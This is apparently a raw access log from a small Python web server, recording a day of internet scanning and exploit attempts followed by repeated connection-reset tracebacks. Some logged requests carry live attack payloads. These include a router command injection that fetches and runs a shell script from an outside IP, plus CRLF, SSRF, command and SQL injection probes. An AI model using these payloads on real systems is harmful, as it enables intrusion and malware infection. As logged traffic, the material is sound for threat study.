192.168.1.1 - - [05/Apr/2024 19:27:34] "GET / HTTP/1.1" 200 - 192.168.1.1 - - [05/Apr/2024 19:27:37] "GET /images/ HTTP/1.1" 200 - 192.168.1.1 - - [05/Apr/2024 19:27:39] "GET /images/radar.png HTTP/1.1" 200 - 192.168.1.1 - - [05/Apr/2024 19:35:48] "GET / HTTP/1.1" 200 - 192.168.1.1 - - [05/Apr/2024 19:35:49] code 404, message File not found 192.168.1.1 - - [05/Apr/2024 19:35:49] "GET /favicon.ico HTTP/1.1" 404 - 134.209.148.8 - - [05/Apr/2024 19:50:24] code 400, message Bad request version ('À\\x14À') 134.209.148.8 - - [05/Apr/2024 19:50:24] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03ØeàÁ·Á¶³\x179\x85\x01CyY\x8bg@ÉVãÏ\x98ý\x8e}Y\x01!Î\x9cI\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 134.209.148.8 - - [05/Apr/2024 19:50:25] code 400, message Bad request version ('À\\x14À') 134.209.148.8 - - [05/Apr/2024 19:50:25] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03üÁ}\x09ÅØÖ\x94Ñ\x92J\x1aÙÂ×\x0cðÑg¬ËéÚ|°RÿJçI\x9c×\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 134.209.148.8 - - [05/Apr/2024 19:50:25] "GET / HTTP/1.1" 200 - 134.209.148.8 - - [05/Apr/2024 19:50:26] code 404, message File not found 134.209.148.8 - - [05/Apr/2024 19:50:26] "GET /form.html HTTP/1.1" 404 - 134.209.148.8 - - [05/Apr/2024 19:50:27] code 404, message File not found 134.209.148.8 - - [05/Apr/2024 19:50:27] "GET /upl.php HTTP/1.1" 404 - 134.209.148.8 - - [05/Apr/2024 19:50:27] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00{\\x01\\x00\\x00w\\x03\\x03\\x91ß\\x03\\x7fb\\x1b\\x92ø¼¿þà¬\\x99\\x92ôòÁÏÅ(ýÝ\\x9aE«Ú\\x0f~z·') 134.209.148.8 - - [05/Apr/2024 19:50:27] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x91ß\x03\x7fb\x1b\x92ø¼¿þà¬\x99\x92ôòÁÏÅ(ýÝ\x9aE«Ú\x0f~z·" 400 - 134.209.148.8 - - [05/Apr/2024 19:50:28] code 404, message File not found 134.209.148.8 - - [05/Apr/2024 19:50:28] "GET /geoip/ HTTP/1.1" 404 - 134.209.148.8 - - [05/Apr/2024 19:50:28] code 404, message File not found 134.209.148.8 - - [05/Apr/2024 19:50:28] "GET /favicon.ico HTTP/1.1" 404 - 134.209.148.8 - - [05/Apr/2024 19:50:29] code 404, message File not found 134.209.148.8 - - [05/Apr/2024 19:50:29] "GET /1.php HTTP/1.1" 404 - 134.209.148.8 - - [05/Apr/2024 19:50:30] code 404, message File not found 134.209.148.8 - - [05/Apr/2024 19:50:30] "GET /bundle.js HTTP/1.1" 404 - 134.209.148.8 - - [05/Apr/2024 19:50:30] code 404, message File not found 134.209.148.8 - - [05/Apr/2024 19:50:30] "GET /files/ HTTP/1.1" 404 - 134.209.148.8 - - [05/Apr/2024 19:50:31] code 404, message File not found 134.209.148.8 - - [05/Apr/2024 19:50:31] "GET /systembc/password.php HTTP/1.1" 404 - 134.209.148.8 - - [05/Apr/2024 19:50:31] code 404, message File not found 134.209.148.8 - - [05/Apr/2024 19:50:31] "GET /password.php HTTP/1.1" 404 - 134.209.148.8 - - [05/Apr/2024 19:50:32] code 404, message File not found 134.209.148.8 - - [05/Apr/2024 19:50:32] "GET /info.php HTTP/1.1" 404 - 185.196.9.61 - - [05/Apr/2024 19:53:54] code 404, message File not found 185.196.9.61 - - [05/Apr/2024 19:53:54] "GET /owa/auth/x.js HTTP/1.1" 404 - 146.19.24.28 - - [05/Apr/2024 20:18:50] "GET / HTTP/1.1" 200 - 45.125.66.34 - - [05/Apr/2024 21:08:28] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [05/Apr/2024 21:08:28] "CONNECT google.com:443 HTTP/1.1" 501 - 198.235.24.234 - - [05/Apr/2024 21:12:47] "GET / HTTP/1.0" 200 - 45.227.254.8 - - [05/Apr/2024 21:14:16] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 45.227.254.8 - - [05/Apr/2024 21:14:16] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 80.94.92.60 - - [05/Apr/2024 21:19:11] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [05/Apr/2024 21:20:37] code 404, message File not found 185.196.9.61 - - [05/Apr/2024 21:20:37] "GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0 HTTP/1.1" 404 - 80.75.212.75 - - [05/Apr/2024 21:32:02] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [05/Apr/2024 21:32:02] "CONNECT www.google.com:443 HTTP/1.1" 501 - 146.19.24.28 - - [05/Apr/2024 22:22:33] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [05/Apr/2024 22:40:45] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [05/Apr/2024 22:40:45] "CONNECT google.com:443 HTTP/1.1" 501 - 162.216.150.242 - - [05/Apr/2024 22:46:53] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('167.94.145.57', 60224) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.145.57 - - [05/Apr/2024 22:49:20] "GET / HTTP/1.1" 200 - 167.94.145.57 - - [05/Apr/2024 22:49:24] "GET / HTTP/1.1" 200 - 167.94.145.57 - - [05/Apr/2024 22:49:25] code 505, message Invalid HTTP version (2.0) 167.94.145.57 - - [05/Apr/2024 22:49:25] "PRI * HTTP/2.0" 505 - 167.94.145.57 - - [05/Apr/2024 22:49:25] code 404, message File not found 167.94.145.57 - - [05/Apr/2024 22:49:25] "GET /favicon.ico HTTP/1.1" 404 - 117.66.222.122 - - [05/Apr/2024 22:56:05] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [05/Apr/2024 23:13:04] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [05/Apr/2024 23:47:49] "GET / HTTP/1.1" 200 - 106.75.173.108 - - [05/Apr/2024 23:50:53] code 404, message File not found 106.75.173.108 - - [05/Apr/2024 23:50:53] "GET /.DS_Store HTTP/1.1" 404 - 80.75.212.75 - - [05/Apr/2024 23:59:44] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [05/Apr/2024 23:59:44] "CONNECT www.google.com:443 HTTP/1.1" 501 - 146.19.24.28 - - [06/Apr/2024 00:15:45] "GET / HTTP/1.1" 200 - 39.103.211.146 - - [06/Apr/2024 00:23:08] "GET / HTTP/1.1" 200 - 36.68.217.100 - - [06/Apr/2024 00:42:13] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [06/Apr/2024 00:47:41] code 501, message Unsupported method ('POST') 185.196.9.61 - - [06/Apr/2024 00:47:41] "POST /admin/ HTTP/1.1" 501 - 3.101.226.142 - - [06/Apr/2024 01:12:11] "HEAD / HTTP/1.1" 200 - 3.101.226.142 - - [06/Apr/2024 01:12:17] "GET / HTTP/1.1" 200 - 3.101.226.142 - - [06/Apr/2024 01:12:18] code 404, message File not found 3.101.226.142 - - [06/Apr/2024 01:12:18] "GET /favicon.ico HTTP/1.1" 404 - 3.101.226.142 - - [06/Apr/2024 01:12:19] "HEAD / HTTP/1.1" 200 - 185.196.9.61 - - [06/Apr/2024 01:34:17] code 400, message Bad request version ('À\\x13À') 185.196.9.61 - - [06/Apr/2024 01:34:17] "\x16\x03\x01\x00ò\x01\x00\x00î\x03\x03\x11g\x90\x9atÐÓe\x1aÍ\x8e#6Þ\x94\x98o. V¢¿8{De½ð½§\x98\x00 \x8e¸ÑÂ\x8d\x8b7ßäïã\x93Óz²ÉuXø´Ú(«ü\x8f3\x06$ö81\x10\x00&̨̩À+À/À,À0À\x09À\x13À" 400 - 185.196.9.61 - - [06/Apr/2024 01:34:17] code 400, message Bad request version ('³\\x9b\\x0e³Ã¼Øí\\x84\\x02£\\x00\\x00*À+À/\\x00\\x9ę̩̪À') 185.196.9.61 - - [06/Apr/2024 01:34:17] "\x16\x03\x01\x00£\x01\x00\x00\x9f\x03\x03ø|1\x9cÚÉÒ¿*wl.6\x02e½\x0d\x86½-\x85³\x9b\x0e³Ã¼Øí\x84\x02£\x00\x00*À+À/\x00\x9ę̩̪À" 400 - 185.196.9.61 - - [06/Apr/2024 01:34:19] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00ò\\x01\\x00\\x00î\\x03\\x03ÊÚ') 185.196.9.61 - - [06/Apr/2024 01:34:19] "\x16\x03\x01\x00ò\x01\x00\x00î\x03\x03ÊÚ" 400 - 185.196.9.61 - - [06/Apr/2024 01:34:20] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00£\\x01\\x00\\x00\\x9f\\x03\\x03H¦\\x01') 185.196.9.61 - - [06/Apr/2024 01:34:20] "\x16\x03\x01\x00£\x01\x00\x00\x9f\x03\x03H¦\x01" 400 - 139.162.245.111 - - [06/Apr/2024 02:00:53] "GET / HTTP/1.1" 200 - 139.162.245.111 - - [06/Apr/2024 02:00:54] code 400, message Bad request version ('\\x00\\x04\\x03\\x00\\x01\\x02\\x00') 139.162.245.111 - - [06/Apr/2024 02:00:54] "\x16\x03\x01\x00ü\x01\x00\x00ø\x03\x03\x8fSì\x08\x11ýU+°\x83\x97\x057uu;Aë¢\x10*\x98@¯¶ªã"»\x13AX ãÄ©Þ\x8a\x05g\x99\x12r\x9bÅ|\x0f>²g\x14\x09\x8dº\x01oy\x81\x87RÎ%ÎÐ'\x00$\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩À$À(À#À'\x00\x9f\x00\x9e\x00k\x00g\x00ÿ\x01\x00\x00\x8b\x00\x0b\x00\x04\x03\x00\x01\x02\x00" 400 - 139.162.245.111 - - [06/Apr/2024 02:00:54] code 400, message Bad request version ('\\x00\\x04\\x03\\x00\\x01\\x02\\x00') 139.162.245.111 - - [06/Apr/2024 02:00:54] "\x16\x03\x01\x00ü\x01\x00\x00ø\x03\x03âA"\x02¯*\x07\x12vQ\x92r]ó$N2ä\x08\x93  \x19¾A\x8eóIk>#¦ ?­Äש\x86\x9ci\x19áÀ©ÎÒ\x87ü§U¾Å\x16¹ÖÒs\x92$\x81Þ3\x0bM\x00$\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩À$À(À#À'\x00\x9f\x00\x9e\x00k\x00g\x00ÿ\x01\x00\x00\x8b\x00\x0b\x00\x04\x03\x00\x01\x02\x00" 400 - 139.162.245.111 - - [06/Apr/2024 02:00:55] code 400, message Bad request version ('\\x00\\x04\\x03\\x00\\x01\\x02\\x00') 139.162.245.111 - - [06/Apr/2024 02:00:55] "\x16\x03\x01\x00ü\x01\x00\x00ø\x03\x03òtPLL)²c\x02ÆXL$\x88\x07õS\x90\x1dtÃ\x9f]lAñqÇUCÝ\x8a Øq¡\x8a¨ç\x09vÞv¢÷\x00Ã;\x05Yÿ)\x98*\x92é\x7fà\x12º'8vÞ\x14\x00$\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩À$À(À#À'\x00\x9f\x00\x9e\x00k\x00g\x00ÿ\x01\x00\x00\x8b\x00\x0b\x00\x04\x03\x00\x01\x02\x00" 400 - 80.75.212.75 - - [06/Apr/2024 02:19:36] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [06/Apr/2024 02:19:36] "CONNECT www.google.com:443 HTTP/1.1" 501 - 80.94.92.60 - - [06/Apr/2024 02:22:53] code 404, message File not found 80.94.92.60 - - [06/Apr/2024 02:22:53] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 - 80.94.92.60 - - [06/Apr/2024 02:39:12] "GET / HTTP/1.1" 200 - 36.99.136.137 - - [06/Apr/2024 02:48:59] "GET / HTTP/1.1" 200 - 36.99.136.137 - - [06/Apr/2024 02:49:02] code 404, message File not found 36.99.136.137 - - [06/Apr/2024 02:49:02] "GET /favicon.ico HTTP/1.1" 404 - 31.132.67.250 - - [06/Apr/2024 02:54:36] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [06/Apr/2024 03:12:55] code 404, message File not found 185.196.9.61 - - [06/Apr/2024 03:12:55] "GET /api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live HTTP/1.1" 404 - 185.196.9.61 - - [06/Apr/2024 03:16:38] code 404, message File not found 185.196.9.61 - - [06/Apr/2024 03:16:38] "GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1" 404 - 185.196.9.61 - - [06/Apr/2024 03:39:01] "GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1" 200 - 185.196.9.61 - - [06/Apr/2024 03:39:06] code 404, message File not found 185.196.9.61 - - [06/Apr/2024 03:39:06] "GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1" 404 - 185.196.9.61 - - [06/Apr/2024 03:39:07] code 404, message File not found 185.196.9.61 - - [06/Apr/2024 03:39:07] "GET /prweb/PRAuth/app/default/ HTTP/1.1" 404 - 78.153.140.179 - - [06/Apr/2024 03:56:09] code 404, message File not found 78.153.140.179 - - [06/Apr/2024 03:56:09] "GET /.env HTTP/1.1" 404 - 78.153.140.179 - - [06/Apr/2024 03:56:09] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00Þ\\x01\\x00\\x00Ú\\x03\\x03ù²j/\\x10\\x87o]º¨r\\x15') 78.153.140.179 - - [06/Apr/2024 03:56:09] "\x16\x03\x01\x00Þ\x01\x00\x00Ú\x03\x03ù²j/\x10\x87o]º¨r\x15\x85Ï>z" 400 - 198.199.111.221 - - [06/Apr/2024 03:56:44] "GET / HTTP/1.1" 200 - 85.208.214.89 - - [06/Apr/2024 04:06:44] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00²\\x01\\x00\\x00®\\x03\\x03xi\\x13FªïU\\x8f\\x17Ñ\\x006=ÃZÈüâ+¯\\x07áÕGÑüÙ\\x8a\\xad"Ù<\\x00\\x00\\x1aÀ/À+À\\x11À\\x07À\\x13À') 85.208.214.89 - - [06/Apr/2024 04:06:44] "\x16\x03\x01\x00²\x01\x00\x00®\x03\x03xi\x13FªïU\x8f\x17Ñ\x006=ÃZÈüâ+¯\x07áÕGÑüÙ\x8a­"Ù<\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 85.208.214.89 - - [06/Apr/2024 04:07:07] code 400, message Bad HTTP/0.9 request type ('l\\x00') 85.208.214.89 - - [06/Apr/2024 04:07:07] "l\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00" 400 - 85.208.214.89 - - [06/Apr/2024 04:07:08] "GET / HTTP/1.1" 200 - 85.208.214.89 - - [06/Apr/2024 04:07:11] code 404, message File not found 85.208.214.89 - - [06/Apr/2024 04:07:11] "GET /favicon.ico HTTP/1.1" 404 - 85.208.214.89 - - [06/Apr/2024 04:07:12] code 404, message File not found 85.208.214.89 - - [06/Apr/2024 04:07:12] "GET /robots.txt HTTP/1.1" 404 - 85.208.214.89 - - [06/Apr/2024 04:07:15] code 404, message File not found 85.208.214.89 - - [06/Apr/2024 04:07:15] "GET /sitemap.xml HTTP/1.1" 404 - 185.224.128.43 - - [06/Apr/2024 04:28:57] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [06/Apr/2024 04:31:55] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [06/Apr/2024 04:31:55] "CONNECT google.com:443 HTTP/1.1" 501 - 146.19.24.28 - - [06/Apr/2024 04:37:57] "GET / HTTP/1.1" 200 - 80.75.212.75 - - [06/Apr/2024 04:54:17] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [06/Apr/2024 04:54:17] "CONNECT www.google.com:443 HTTP/1.1" 501 - 162.243.143.56 - - [06/Apr/2024 05:27:33] code 400, message Bad request syntax ('MGLNDD_194.193.213.117_80') 162.243.143.56 - - [06/Apr/2024 05:27:33] "MGLNDD_194.193.213.117_80" 400 - 109.205.213.198 - - [06/Apr/2024 06:08:12] "GET / HTTP/1.1" 200 - 106.75.165.113 - - [06/Apr/2024 06:22:55] code 404, message File not found 106.75.165.113 - - [06/Apr/2024 06:22:55] "GET /.vscode/sftp.json HTTP/1.1" 404 - 185.180.140.6 - - [06/Apr/2024 06:24:23] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [06/Apr/2024 06:42:31] code 501, message Unsupported method ('POST') 185.196.9.61 - - [06/Apr/2024 06:42:31] "POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1" 501 - 146.19.24.28 - - [06/Apr/2024 06:47:20] "GET / HTTP/1.1" 200 - 80.75.212.75 - - [06/Apr/2024 07:16:00] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [06/Apr/2024 07:16:00] "CONNECT www.google.com:443 HTTP/1.1" 501 - 146.19.24.28 - - [06/Apr/2024 07:31:04] "GET / HTTP/1.1" 200 - 34.140.108.54 - - [06/Apr/2024 07:58:30] "GET / HTTP/1.1" 200 - 87.246.7.66 - - [06/Apr/2024 08:17:42] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [06/Apr/2024 08:25:49] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 146.19.24.28 - - [06/Apr/2024 08:30:08] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 55660) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 46888) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 44000) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 41960) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 45483) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 24136) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 40266) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 32266) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 32582) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 56106) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 57801) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 12624) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 19910) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in 